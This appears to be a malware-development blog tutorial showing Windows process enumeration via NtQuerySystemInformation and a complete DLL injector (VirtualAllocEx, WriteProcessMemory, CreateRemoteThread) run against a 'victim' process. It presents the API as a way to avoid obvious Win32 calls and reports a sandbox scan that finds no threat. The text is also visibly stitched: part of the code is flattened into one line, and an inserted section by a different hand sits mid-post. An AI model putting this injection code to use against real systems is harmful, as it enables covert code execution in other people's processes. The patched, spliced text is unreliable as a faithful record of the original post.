  pNtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)5, NULL, 0, &uReturnLen);

  // allocate memory
  SystemProcInfo = (PSYSTEM_PROCESS_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)uReturnLen);
  if (SystemProcInfo == NULL) {
    HeapFree(GetProcessHeap(), 0, szTargetProc);
    return 0;
  }
  pValueToFree = SystemProcInfo;

  // get information about processes
  // (if processes were created between the two calls the buffer is too small and this fails;
  // production code should retry with the new uReturnLen)
  STATUS = pNtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)5, SystemProcInfo, uReturnLen, &uReturnLen);
  if (STATUS != 0) {
    HeapFree(GetProcessHeap(), 0, pValueToFree);
    HeapFree(GetProcessHeap(), 0, szTargetProc);
    return 0;
  }

  // enum: walk the chain of entries via NextEntryOffset (0 = last entry)
  while (TRUE) {
    if (SystemProcInfo->ImageName.Length && SystemProcInfo->ImageName.Buffer) {
      if (wcscmp(SystemProcInfo->ImageName.Buffer, szTargetProc) == 0) {
        pid = (int)(ULONG_PTR)SystemProcInfo->UniqueProcessId;
        break;
      }
    }
    if (!SystemProcInfo->NextEntryOffset) break;
    SystemProcInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONG_PTR)SystemProcInfo + SystemProcInfo->NextEntryOffset);
  }

  // cleanup
  HeapFree(GetProcessHeap(), 0, pValueToFree);
  HeapFree(GetProcessHeap(), 0, szTargetProc);
  return pid;
}

int main(int argc, char *argv[]) {
  int pid = 0; // process ID
  if (argc < 2) {
    printf("usage: %s <process name>\n", argv[0]);
    return 1;
  }
  pid = findMyProc(argv[1]);
  printf("%s%d\n", pid > 0 ? "process found at pid = " : "process not found. pid = ", pid);
  return 0;
}
```

## demo

Let's compile it using MinGW:

```bash
x86_64-w64-mingw32-gcc hack.c -o hack.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -static-libgcc
```

Now, let's test it. I'll open mspaint.exe and try to find its PID:

```powershell
.\hack.exe mspaint.exe
```

As you can see, everything works as expected! =^..^=

Let's analyze with ANY.RUN:

As you can see, ANY.RUN says that everything is ok: no threats detected. So our process enumeration logic using this NT function does not look like a malicious or suspicious action.

https://app.any.run/tasks/b6caa188-9899-4181-affe-5c4e25f4ca82

## practical example 2. DLL injection

Of course we can use it for some "bad" actions. Let's say we have a "malicious" DLL:

```c
/*
 * evil.c
 * simple DLL for DLL inject to process
 * author: @cocomelonc
 */
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {
  switch (nReason) {
    case DLL_PROCESS_ATTACH:
      MessageBox(NULL, "Meow from evil.dll!", "=^..^=", MB_OK);
      break;
    case DLL_PROCESS_DETACH:
      break;
    case DLL_THREAD_ATTACH:
      break;
    case DLL_THREAD_DETACH:
      break;
  }
  return TRUE;
}
```

Let's inject it by finding the victim's PID via NtQuerySystemInformation (hack2.c):

```c
/*
 * hack2.c
 * process enum via NtQuerySystemInformation
 * DLL injection example
 * author: @cocomelonc
 * https://cocomelonc.github.io/malware/2025/12/26/malware-trick-55.html
 */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   // header names were lost from the page; stdlib.h and string.h are assumed
#include <string.h>

char evilDLL[] = "Z:\\evil.dll";
unsigned int evilLen = sizeof(evilDLL) + 1;

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

// https://github.com/winsiderss/systeminformer/blob/master/phnt/include/ntexapi.h#L1324
// SYSTEM_INFORMATION_CLASS: the same enum as in hack.c above
```
q: SYSTEM_BOOT_ENVIRONMENT_INFORMATION // 90 SystemHypervisorInformation , // q: SYSTEM_HYPERVISOR_QUERY_INFORMATION SystemVerifierInformationEx , // q; s: SYSTEM_VERIFIER_INFORMATION_EX SystemTimeZoneInformation , // q; s: RTL_TIME_ZONE_INFORMATION (requires SeTimeZonePrivilege) SystemImageFileExecutionOptionsInformation , // s: SYSTEM_IMAGE_FILE_EXECUTION_OPTIONS_INFORMATION (requires SeTcbPrivilege) SystemCoverageInformation , // q: COVERAGE_MODULES s: COVERAGE_MODULE_REQUEST // ExpCovQueryInformation (requires SeDebugPrivilege) SystemPrefetchPatchInformation , // SYSTEM_PREFETCH_PATCH_INFORMATION SystemVerifierFaultsInformation , // s: SYSTEM_VERIFIER_FAULTS_INFORMATION (requires SeDebugPrivilege) SystemSystemPartitionInformation , // q: SYSTEM_SYSTEM_PARTITION_INFORMATION SystemSystemDiskInformation , // q: SYSTEM_SYSTEM_DISK_INFORMATION SystemProcessorPerformanceDistribution , // q: SYSTEM_PROCESSOR_PERFORMANCE_DISTRIBUTION (EX in: USHORT ProcessorGroup) // 100 SystemNumaProximityNodeInformation , // q; s: SYSTEM_NUMA_PROXIMITY_MAP SystemDynamicTimeZoneInformation , // q; s: RTL_DYNAMIC_TIME_ZONE_INFORMATION (requires SeTimeZonePrivilege) SystemCodeIntegrityInformation , // q: SYSTEM_CODEINTEGRITY_INFORMATION // SeCodeIntegrityQueryInformation SystemProcessorMicrocodeUpdateInformation , // s: SYSTEM_PROCESSOR_MICROCODE_UPDATE_INFORMATION SystemProcessorBrandString , // q: CHAR[] // HaliQuerySystemInformation -> HalpGetProcessorBrandString, info class 23 SystemVirtualAddressInformation , // q: SYSTEM_VA_LIST_INFORMATION[]; s: SYSTEM_VA_LIST_INFORMATION[] (requires SeIncreaseQuotaPrivilege) // MmQuerySystemVaInformation SystemLogicalProcessorAndGroupInformation , // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX (EX in: LOGICAL_PROCESSOR_RELATIONSHIP RelationshipType) // since WIN7 // KeQueryLogicalProcessorRelationship SystemProcessorCycleTimeInformation , // q: SYSTEM_PROCESSOR_CYCLE_TIME_INFORMATION[] (EX in: USHORT ProcessorGroup) SystemStoreInformation , // q; 
s: SYSTEM_STORE_INFORMATION (requires SeProfileSingleProcessPrivilege) // SmQueryStoreInformation SystemRegistryAppendString , // s: SYSTEM_REGISTRY_APPEND_STRING_PARAMETERS // 110 SystemAitSamplingValue , // s: ULONG (requires SeProfileSingleProcessPrivilege) SystemVhdBootInformation , // q: SYSTEM_VHD_BOOT_INFORMATION SystemCpuQuotaInformation , // q; s: PS_CPU_QUOTA_QUERY_INFORMATION SystemNativeBasicInformation , // q: SYSTEM_BASIC_INFORMATION SystemErrorPortTimeouts , // SYSTEM_ERROR_PORT_TIMEOUTS SystemLowPriorityIoInformation , // q: SYSTEM_LOW_PRIORITY_IO_INFORMATION SystemTpmBootEntropyInformation , // q: TPM_BOOT_ENTROPY_NT_RESULT // ExQueryTpmBootEntropyInformation SystemVerifierCountersInformation , // q: SYSTEM_VERIFIER_COUNTERS_INFORMATION SystemPagedPoolInformationEx , // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypePagedPool) SystemSystemPtesInformationEx , // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemPtes) // 120 SystemNodeDistanceInformation , // q: USHORT[4*NumaNodes] // (EX in: USHORT NodeNumber) SystemAcpiAuditInformation , // q: SYSTEM_ACPI_AUDIT_INFORMATION // HaliQuerySystemInformation -> HalpAuditQueryResults, info class 26 SystemBasicPerformanceInformation , // q: SYSTEM_BASIC_PERFORMANCE_INFORMATION // name:wow64:whNtQuerySystemInformation_SystemBasicPerformanceInformation SystemQueryPerformanceCounterInformation , // q: SYSTEM_QUERY_PERFORMANCE_COUNTER_INFORMATION // since WIN7 SP1 SystemSessionBigPoolInformation , // q: SYSTEM_SESSION_POOLTAG_INFORMATION // since WIN8 SystemBootGraphicsInformation , // q; s: SYSTEM_BOOT_GRAPHICS_INFORMATION (kernel-mode only) SystemScrubPhysicalMemoryInformation , // q; s: MEMORY_SCRUB_INFORMATION SystemBadPageInformation , SystemProcessorProfileControlArea , // q; s: SYSTEM_PROCESSOR_PROFILE_CONTROL_AREA SystemCombinePhysicalMemoryInformation , // s: MEMORY_COMBINE_INFORMATION, 
MEMORY_COMBINE_INFORMATION_EX, MEMORY_COMBINE_INFORMATION_EX2 // 130 SystemEntropyInterruptTimingInformation , // q; s: SYSTEM_ENTROPY_TIMING_INFORMATION SystemConsoleInformation , // q; s: SYSTEM_CONSOLE_INFORMATION SystemPlatformBinaryInformation , // q: SYSTEM_PLATFORM_BINARY_INFORMATION (requires SeTcbPrivilege) SystemPolicyInformation , // q: SYSTEM_POLICY_INFORMATION (Warbird/Encrypt/Decrypt/Execute) SystemHypervisorProcessorCountInformation , // q: SYSTEM_HYPERVISOR_PROCESSOR_COUNT_INFORMATION SystemDeviceDataInformation , // q: SYSTEM_DEVICE_DATA_INFORMATION SystemDeviceDataEnumerationInformation , // q: SYSTEM_DEVICE_DATA_INFORMATION SystemMemoryTopologyInformation , // q: SYSTEM_MEMORY_TOPOLOGY_INFORMATION SystemMemoryChannelInformation , // q: SYSTEM_MEMORY_CHANNEL_INFORMATION SystemBootLogoInformation , // q: SYSTEM_BOOT_LOGO_INFORMATION // 140 SystemProcessorPerformanceInformationEx , // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION_EX // (EX in: USHORT ProcessorGroup) // since WINBLUE SystemCriticalProcessErrorLogInformation , SystemSecureBootPolicyInformation , // q: SYSTEM_SECUREBOOT_POLICY_INFORMATION SystemPageFileInformationEx , // q: SYSTEM_PAGEFILE_INFORMATION_EX SystemSecureBootInformation , // q: SYSTEM_SECUREBOOT_INFORMATION SystemEntropyInterruptTimingRawInformation , SystemPortableWorkspaceEfiLauncherInformation , // q: SYSTEM_PORTABLE_WORKSPACE_EFI_LAUNCHER_INFORMATION SystemFullProcessInformation , // q: SYSTEM_PROCESS_INFORMATION with SYSTEM_PROCESS_INFORMATION_EXTENSION (requires admin) SystemKernelDebuggerInformationEx , // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX SystemBootMetadataInformation , // 150 SystemSoftRebootInformation , // q: ULONG SystemElamCertificateInformation , // s: SYSTEM_ELAM_CERTIFICATE_INFORMATION SystemOfflineDumpConfigInformation , // q: OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2 SystemProcessorFeaturesInformation , // q: SYSTEM_PROCESSOR_FEATURES_INFORMATION SystemRegistryReconciliationInformation , // s: NULL 
(requires admin) (flushes registry hives) SystemEdidInformation , // q: SYSTEM_EDID_INFORMATION SystemManufacturingInformation , // q: SYSTEM_MANUFACTURING_INFORMATION // since THRESHOLD SystemEnergyEstimationConfigInformation , // q: SYSTEM_ENERGY_ESTIMATION_CONFIG_INFORMATION SystemHypervisorDetailInformation , // q: SYSTEM_HYPERVISOR_DETAIL_INFORMATION SystemProcessorCycleStatsInformation , // q: SYSTEM_PROCESSOR_CYCLE_STATS_INFORMATION (EX in: USHORT ProcessorGroup) // 160 SystemVmGenerationCountInformation , SystemTrustedPlatformModuleInformation , // q: SYSTEM_TPM_INFORMATION SystemKernelDebuggerFlags , // SYSTEM_KERNEL_DEBUGGER_FLAGS SystemCodeIntegrityPolicyInformation , // q; s: SYSTEM_CODEINTEGRITYPOLICY_INFORMATION SystemIsolatedUserModeInformation , // q: SYSTEM_ISOLATED_USER_MODE_INFORMATION SystemHardwareSecurityTestInterfaceResultsInformation , SystemSingleModuleInformation , // q: SYSTEM_SINGLE_MODULE_INFORMATION SystemAllowedCpuSetsInformation , SystemVsmProtectionInformation , // q: SYSTEM_VSM_PROTECTION_INFORMATION (previously SystemDmaProtectionInformation) SystemInterruptCpuSetsInformation , // q: SYSTEM_INTERRUPT_CPU_SET_INFORMATION // 170 SystemSecureBootPolicyFullInformation , // q: SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION SystemCodeIntegrityPolicyFullInformation , SystemAffinitizedInterruptProcessorInformation , // (requires SeIncreaseBasePriorityPrivilege) SystemRootSiloInformation , // q: SYSTEM_ROOT_SILO_INFORMATION SystemCpuSetInformation , // q: SYSTEM_CPU_SET_INFORMATION // since THRESHOLD2 SystemCpuSetTagInformation , // q: SYSTEM_CPU_SET_TAG_INFORMATION SystemWin32WerStartCallout , SystemSecureKernelProfileInformation , // q: SYSTEM_SECURE_KERNEL_HYPERGUARD_PROFILE_INFORMATION SystemCodeIntegrityPlatformManifestInformation , // q: SYSTEM_SECUREBOOT_PLATFORM_MANIFEST_INFORMATION // since REDSTONE SystemInterruptSteeringInformation , // SYSTEM_INTERRUPT_STEERING_INFORMATION_INPUT // 180 SystemSupportedProcessorArchitectures , // p: 
in opt: HANDLE, out: SYSTEM_SUPPORTED_PROCESSOR_ARCHITECTURES_INFORMATION[] // NtQuerySystemInformationEx SystemMemoryUsageInformation , // q: SYSTEM_MEMORY_USAGE_INFORMATION SystemCodeIntegrityCertificateInformation , // q: SYSTEM_CODEINTEGRITY_CERTIFICATE_INFORMATION SystemPhysicalMemoryInformation , // q: SYSTEM_PHYSICAL_MEMORY_INFORMATION // since REDSTONE2 SystemControlFlowTransition , // (Warbird/Encrypt/Decrypt/Execute) SystemKernelDebuggingAllowed , // s: ULONG SystemActivityModerationExeState , // SYSTEM_ACTIVITY_MODERATION_EXE_STATE SystemActivityModerationUserSettings , // SYSTEM_ACTIVITY_MODERATION_USER_SETTINGS SystemCodeIntegrityPoliciesFullInformation , SystemCodeIntegrityUnlockInformation , // SYSTEM_CODEINTEGRITY_UNLOCK_INFORMATION // 190 SystemIntegrityQuotaInformation , SystemFlushInformation , // q: SYSTEM_FLUSH_INFORMATION SystemProcessorIdleMaskInformation , // q: ULONG_PTR[ActiveGroupCount] // since REDSTONE3 SystemSecureDumpEncryptionInformation , SystemWriteConstraintInformation , // SYSTEM_WRITE_CONSTRAINT_INFORMATION SystemKernelVaShadowInformation , // SYSTEM_KERNEL_VA_SHADOW_INFORMATION SystemHypervisorSharedPageInformation , // SYSTEM_HYPERVISOR_SHARED_PAGE_INFORMATION // since REDSTONE4 SystemFirmwareBootPerformanceInformation , SystemCodeIntegrityVerificationInformation , // SYSTEM_CODEINTEGRITYVERIFICATION_INFORMATION SystemFirmwarePartitionInformation , // SYSTEM_FIRMWARE_PARTITION_INFORMATION // 200 SystemSpeculationControlInformation , // SYSTEM_SPECULATION_CONTROL_INFORMATION // (CVE-2017-5715) REDSTONE3 and above. 
SystemDmaGuardPolicyInformation , // SYSTEM_DMA_GUARD_POLICY_INFORMATION SystemEnclaveLaunchControlInformation , // SYSTEM_ENCLAVE_LAUNCH_CONTROL_INFORMATION SystemWorkloadAllowedCpuSetsInformation , // SYSTEM_WORKLOAD_ALLOWED_CPU_SET_INFORMATION // since REDSTONE5 SystemCodeIntegrityUnlockModeInformation , SystemLeapSecondInformation , // SYSTEM_LEAP_SECOND_INFORMATION SystemFlags2Information , // q: SYSTEM_FLAGS_INFORMATION SystemSecurityModelInformation , // SYSTEM_SECURITY_MODEL_INFORMATION // since 19H1 SystemCodeIntegritySyntheticCacheInformation , SystemFeatureConfigurationInformation , // SYSTEM_FEATURE_CONFIGURATION_INFORMATION // since 20H1 // 210 SystemFeatureConfigurationSectionInformation , // SYSTEM_FEATURE_CONFIGURATION_SECTIONS_INFORMATION SystemFeatureUsageSubscriptionInformation , // SYSTEM_FEATURE_USAGE_SUBSCRIPTION_DETAILS SystemSecureSpeculationControlInformation , // SECURE_SPECULATION_CONTROL_INFORMATION SystemSpacesBootInformation , // since 20H2 SystemFwRamdiskInformation , // SYSTEM_FIRMWARE_RAMDISK_INFORMATION SystemWheaIpmiHardwareInformation , SystemDifSetRuleClassInformation , SystemDifClearRuleClassInformation , SystemDifApplyPluginVerificationOnDriver , SystemDifRemovePluginVerificationOnDriver , // 220 SystemShadowStackInformation , // SYSTEM_SHADOW_STACK_INFORMATION SystemBuildVersionInformation , // SYSTEM_BUILD_VERSION_INFORMATION SystemPoolLimitInformation , // SYSTEM_POOL_LIMIT_INFORMATION (requires SeIncreaseQuotaPrivilege) SystemCodeIntegrityAddDynamicStore , SystemCodeIntegrityClearDynamicStores , SystemDifPoolTrackingInformation , SystemPoolZeroingInformation , // SYSTEM_POOL_ZEROING_INFORMATION SystemDpcWatchdogInformation , SystemDpcWatchdogInformation2 , SystemSupportedProcessorArchitectures2 , // q: in opt: HANDLE, out: SYSTEM_SUPPORTED_PROCESSOR_ARCHITECTURES_INFORMATION[] // NtQuerySystemInformationEx // 230 SystemSingleProcessorRelationshipInformation , // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX // (EX in: 
PROCESSOR_NUMBER Processor) SystemXfgCheckFailureInformation , SystemIommuStateInformation , // SYSTEM_IOMMU_STATE_INFORMATION // since 22H1 SystemHypervisorMinrootInformation , // SYSTEM_HYPERVISOR_MINROOT_INFORMATION SystemHypervisorBootPagesInformation , // SYSTEM_HYPERVISOR_BOOT_PAGES_INFORMATION SystemPointerAuthInformation , // SYSTEM_POINTER_AUTH_INFORMATION SystemSecureKernelDebuggerInformation , SystemOriginalImageFeatureInformation , MaxSystemInfoClass } SYSTEM_INFORMATION_CLASS ; // https://processhacker.sourceforge.io/doc/ntbasic_8h.html typedef LONG KPRIORITY ; // https://doxygen.reactos.org/da/df4/struct__SYSTEM__PROCESS__INFORMATION.html typedef struct _SYSTEM_PROCESS_INFORMATION { ULONG NextEntryOffset ; ULONG NumberOfThreads ; LARGE_INTEGER WorkingSetPrivateSize ; //VISTA ULONG HardFaultCount ; //WIN7 ULONG NumberOfThreadsHighWatermark ; //WIN7 ULONGLONG CycleTime ; //WIN7 LARGE_INTEGER CreateTime ; LARGE_INTEGER UserTime ; LARGE_INTEGER KernelTime ; UNICODE_STRING ImageName ; KPRIORITY BasePriority ; HANDLE UniqueProcessId ; HANDLE InheritedFromUniqueProcessId ; ULONG HandleCount ; ULONG SessionId ; ULONG_PTR PageDirectoryBase ; SIZE_T PeakVirtualSize ; SIZE_T VirtualSize ; ULONG PageFaultCount ; SIZE_T PeakWorkingSetSize ; SIZE_T WorkingSetSize ; SIZE_T QuotaPeakPagedPoolUsage ; SIZE_T QuotaPagedPoolUsage ; SIZE_T QuotaPeakNonPagedPoolUsage ; SIZE_T QuotaNonPagedPoolUsage ; SIZE_T PagefileUsage ; SIZE_T PeakPagefileUsage ; SIZE_T PrivatePageCount ; LARGE_INTEGER ReadOperationCount ; LARGE_INTEGER WriteOperationCount ; LARGE_INTEGER OtherOperationCount ; LARGE_INTEGER ReadTransferCount ; LARGE_INTEGER WriteTransferCount ; LARGE_INTEGER OtherTransferCount ; // SYSTEM_THREAD_INFORMATION TH[1]; } SYSTEM_PROCESS_INFORMATION , * PSYSTEM_PROCESS_INFORMATION ; // typedef NtQuerySystemInformation typedef NTSTATUS ( NTAPI * fnNtQuerySystemInformation )( SYSTEM_INFORMATION_CLASS SystemInformationClass , PVOID SystemInformation , ULONG 
SystemInformationLength , PULONG ReturnLength ); int findMyProc ( const char * procName ) { fnNtQuerySystemInformation pNtQuerySystemInformation = NULL ; ULONG uReturnLen = 0 ; PSYSTEM_PROCESS_INFORMATION SystemProcInfo = NULL ; PVOID pValueToFree = NULL ; NTSTATUS STATUS = 0 ; int pid = 0 ; // get function address from ntdll pNtQuerySystemInformation = ( fnNtQuerySystemInformation ) GetProcAddress ( GetModuleHandle ( "ntdll.dll" ), "NtQuerySystemInformation" ); if ( pNtQuerySystemInformation == NULL ) return 0 ; // convert ANSI to WideChar (LPCWSTR) for comparsion int nLen = MultiByteToWideChar ( CP_ACP , 0 , procName , - 1 , NULL , 0 ); WCHAR * szTargetProc = ( WCHAR * ) HeapAlloc ( GetProcessHeap (), HEAP_ZERO_MEMORY , nLen * sizeof ( WCHAR )); if ( szTargetProc == NULL ) return 0 ; MultiByteToWideChar ( CP_ACP , 0 , procName , - 1 , szTargetProc , nLen ); // get buffer size pNtQuerySystemInformation (( SYSTEM_INFORMATION_CLASS ) 5 , NULL , 0 , & uReturnLen ); // allocate memory SystemProcInfo = ( PSYSTEM_PROCESS_INFORMATION ) HeapAlloc ( GetProcessHeap (), HEAP_ZERO_MEMORY , ( SIZE_T ) uReturnLen ); if ( SystemProcInfo == NULL ) { HeapFree ( GetProcessHeap (), 0 , szTargetProc ); return 0 ; } pValueToFree = SystemProcInfo ; // get information about processes STATUS = pNtQuerySystemInformation (( SYSTEM_INFORMATION_CLASS ) 5 , SystemProcInfo , uReturnLen , & uReturnLen ); if ( STATUS != 0 ) { HeapFree ( GetProcessHeap (), 0 , pValueToFree ); HeapFree ( GetProcessHeap (), 0 , szTargetProc ); return 0 ; } // enum while ( TRUE ) { if ( SystemProcInfo -> ImageName . Length && SystemProcInfo -> ImageName . Buffer ) { if ( wcscmp ( SystemProcInfo -> ImageName . Buffer , szTargetProc ) == 0 ) { pid = ( int )( ULONG_PTR ) SystemProcInfo -> UniqueProcessId ; break ; } } if ( ! 
SystemProcInfo -> NextEntryOffset ) break ; SystemProcInfo = ( PSYSTEM_PROCESS_INFORMATION )(( ULONG_PTR ) SystemProcInfo + SystemProcInfo -> NextEntryOffset ); } // cleanup HeapFree ( GetProcessHeap (), 0 , pValueToFree ); HeapFree ( GetProcessHeap (), 0 , szTargetProc ); return pid ; } int main ( int argc , char * argv []) { int pid = 0 ; // process ID HANDLE ph ; // process handle HANDLE rt ; // remote thread LPVOID rb ; // remote buffer // handle to kernel32 and pass it to GetProcAddress HMODULE hKernel32 = GetModuleHandle ( "Kernel32" ); VOID * lb = GetProcAddress ( hKernel32 , "LoadLibraryA" ); // get process ID by name pid = findMyProc ( argv [ 1 ]); printf ( "%s%d \n " , pid > 0 ? "process found at pid = " : "process not found. pid = " , pid ); if ( pid == 0 ) { return - 1 ; } // open process ph = OpenProcess ( PROCESS_ALL_ACCESS , FALSE , DWORD ( pid )); if ( ph == NULL ) { printf ( "OpenProcess failed! exiting... \n " ); return - 1 ; } // allocate memory buffer for remote process rb = VirtualAllocEx ( ph , NULL , evilLen , ( MEM_RESERVE | MEM_COMMIT ), PAGE_EXECUTE_READWRITE ); // "copy" evil DLL between processes WriteProcessMemory ( ph , rb , evilDLL , evilLen , NULL ); // our process start new thread rt = CreateRemoteThread ( ph , NULL , 0 , ( LPTHREAD_START_ROUTINE ) lb , rb , 0 , NULL ); CloseHandle ( ph ); return 0 ; } As you can see, logic is pretty simple, find PID via NtQuerySystemInformation and inject our meow DLL. demo 2 Compile DLL: x86_64-w64-mingw32-gcc -shared -o evil.dll evil.c Compile our malware: x86_64-w64-mingw32-gcc hack.c -o hack.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -static-libgcc Then run on our victim’s machine: . \hack2.exe mspaint.exe As you can see, everything is worked perfectly again, as expected! =^..^= Let’s analyze with ANY.RUN : As you can see, ANY.RUN says that: Suspicious activity . 
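The NextEntryOffset walk is where a hand-rolled enumerator usually goes wrong: the loop above trusts every offset and pointer it reads and compares names case-sensitively with wcscmp. As an added example (my code, not the post's), here is the same walk with bounds checks and a case-insensitive match, run over a constructed buffer; SPI_MIN is a hypothetical trimmed stand-in for SYSTEM_PROCESS_INFORMATION so the code builds and runs off Windows, and find_pid and build_sample are my names.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Platform-neutral stand-ins for the Windows types the walk touches, so the
 * traversal can run and be tested off-box. Field offsets do NOT match the real
 * SYSTEM_PROCESS_INFORMATION layout; only the walk itself is the same. */
typedef uint16_t WCHAR16;                 /* Windows WCHAR is 16-bit */
typedef struct {
    uint16_t Length;                      /* bytes, terminator not counted */
    uint16_t MaximumLength;
    WCHAR16 *Buffer;
} UNICODE_STRING16;
typedef struct {
    uint32_t NextEntryOffset;             /* 0 marks the last entry */
    UNICODE_STRING16 ImageName;
    uintptr_t UniqueProcessId;
} SPI_MIN;                                /* hypothetical trimmed struct */
static int lower_ascii(int c) { return (c >= 'A' && c <= 'Z') ? c + 32 : c; }

/* Case-insensitive compare of a UTF-16 image name with an ASCII target. The
 * post's wcscmp() is case-sensitive, so "MSPaint.exe" never matches
 * "mspaint.exe" there, although Windows image names are case-insensitive. */
static int name_matches(const WCHAR16 *w, size_t nchars, const char *target)
{
    size_t i;
    for (i = 0; i < nchars; i++) {
        if (target[i] == '\0' || w[i] > 0x7F) return 0;
        if (lower_ascii(w[i]) != lower_ascii((unsigned char)target[i])) return 0;
    }
    return target[i] == '\0';
}

/* Walk a SystemProcessInformation buffer of len bytes; return the PID of the
 * first entry whose ImageName equals target, else 0. Every read is checked
 * against [buf, buf+len): the kernel stores the name strings inside the same
 * buffer, so a Buffer outside it means bogus data or a buffer cut short by
 * the STATUS_INFO_LENGTH_MISMATCH race between the size query and the fill. */
uintptr_t find_pid(const unsigned char *buf, size_t len, const char *target)
{
    uintptr_t lo = (uintptr_t)buf, hi = lo + len;
    size_t off = 0;
    while (off + sizeof(SPI_MIN) <= len) {
        const SPI_MIN *e = (const SPI_MIN *)(buf + off);
        uintptr_t nb = (uintptr_t)e->ImageName.Buffer;
        if (e->ImageName.Length && nb >= lo && nb + e->ImageName.Length <= hi &&
            name_matches(e->ImageName.Buffer, e->ImageName.Length / 2, target))
            return e->UniqueProcessId;
        /* 0 = last entry; a non-zero offset shorter than a header is corrupt */
        if (e->NextEntryOffset < sizeof(SPI_MIN)) break;
        off += e->NextEntryOffset;
    }
    return 0;
}

/* Constructed sample (not captured from a real system): three entries laid
 * out the way the kernel does it, each header followed by its name string. */
static union { unsigned char b[256]; uint64_t align; } arena;
size_t build_sample(const unsigned char **out)
{
    const char *names[] = { "System", "MSPaint.exe", "notepad.exe" };
    const uintptr_t pids[] = { 4, 1234, 5678 };
    size_t off = 0, i, k;
    for (i = 0; i < 3; i++) {
        SPI_MIN *e = (SPI_MIN *)(arena.b + off);
        WCHAR16 *w = (WCHAR16 *)(arena.b + off + sizeof(SPI_MIN));
        size_t nlen = strlen(names[i]);
        size_t entry = (sizeof(SPI_MIN) + (nlen + 1) * 2 + 7) & ~(size_t)7;
        for (k = 0; k < nlen; k++) w[k] = (WCHAR16)names[i][k];
        w[nlen] = 0;
        e->ImageName.Length = (uint16_t)(nlen * 2);
        e->ImageName.MaximumLength = (uint16_t)((nlen + 1) * 2);
        e->ImageName.Buffer = w;
        e->UniqueProcessId = pids[i];
        e->NextEntryOffset = (i == 2) ? 0 : (uint32_t)entry;
        off += entry;
    }
    *out = arena.b;
    return off;
}
```

Passing a shortened len to find_pid models the truncated-buffer case: the walk skips the entry whose name lies past the end and stops instead of reading out of bounds.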
https://app.any.run/tasks/cf60b6ba-817e-4f86-b887-693be8419a4f

But this is related to the injection logic and not to our NT function.

Thanks to ANY.RUN for API!

### final words

Using NtQuerySystemInformation is another classic technique in malware development to stay away from the more obvious Win32 APIs. While not a “silver bullet” against modern EDRs (which monitor NTAPI calls as well), it provides a better understanding of how Windows manages process data internally.

As far as I know, this function is used by Process Hacker for performance in process enumeration. The MHook library also got a significant performance boost when switching from CreateToolhelp32Snapshot() to NtQuerySystemInformation().

Another caveat: by intercepting calls to the NtQuerySystemInformation function, we can also hide a specified process from common process monitoring tools such as Task Manager and Process Hacker. This is also an interesting trick in malware development, but I will write about it in a separate post.

I hope this post is useful for malware researchers, C/C++ programmers, spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red teamers' arsenal.

- NtQuerySystemInformation
- Mhook Enhancements: 10x Speed Improvement and Other Fixes
- ANY.RUN
- ANY.RUN: hack.exe
- ANY.RUN: hack2.exe
- source code in Github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine